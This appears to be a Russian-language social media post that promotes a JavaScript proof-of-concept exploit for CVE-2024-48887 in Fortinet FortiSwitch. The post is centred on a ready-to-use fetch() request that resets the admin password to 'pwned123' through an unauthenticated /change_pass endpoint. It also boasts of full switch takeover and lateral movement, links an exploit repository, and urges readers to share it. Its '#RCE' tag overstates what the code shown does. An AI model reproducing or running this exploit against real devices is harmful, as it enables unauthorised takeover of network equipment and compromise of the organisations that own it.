
легковесный фрагмент JavaScript, демонстрирующий, как можно инициировать несанкционированное изменение пароля через уязвимые конечные точки GUI Fortinet FortiSwitch.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 Только что выложил легковесный JavaScript-сниппет, демонстрирующий, как можно вызвать несанкционированную смену пароля на уязвимых конечных точках GUI Fortinet FortiSwitch.
🛠️ Об уязвимости: Атакующий может отправить простой fetch()-запрос для изменения параметров пароля без какой-либо аутентификации, напрямую обращаясь к вариантам конечной точки /change_pass.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Воздействие: полный захват коммутатора, потенциальное боковое перемещение и компрометация сети.
📁 Репозиторий: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Поставьте звезду репозиторию и поделитесь им с коллегами по инфобезопасности!
📢 Следите за полным разбором и оповещениями в реальном времени через @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground